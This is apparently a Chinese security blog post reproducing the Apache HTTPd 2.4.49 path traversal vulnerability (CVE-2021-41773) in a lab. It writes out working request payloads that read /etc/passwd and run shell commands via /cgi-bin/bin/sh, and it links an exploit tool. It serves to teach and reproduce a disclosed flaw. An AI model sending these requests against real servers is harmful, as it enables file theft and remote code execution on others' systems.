CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现
0、前言
复现文章是好几个月前的了,最近也做过几次漏洞复现,奈何是在是CVE有点远古(实则是自己犯懒)就没写,今天就水一篇新的CVE吧。
1、漏洞简介
Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
2、影响版本
Apache HTTP Server 2.4.49
3、漏洞复现
这里我使用的是vulhub的环境,虚拟机上之前部的环境有点老,没有CVE-2021-41773,只能是将之前的删除重新下载最新的。docker开启步骤就省略。
浏览器访问ip:8080。页面出现it works! 证明开启成功。
开启代理,上神器burpsuite就可以开搞了。
路径穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
RCE
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo; ls(要执行的命令)
4、修复方案
升级到最新版的Apache HTTP Server 安全版本。
5、利用工具
多翻了一下相关文章,找到了一个漏洞利用工具。
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐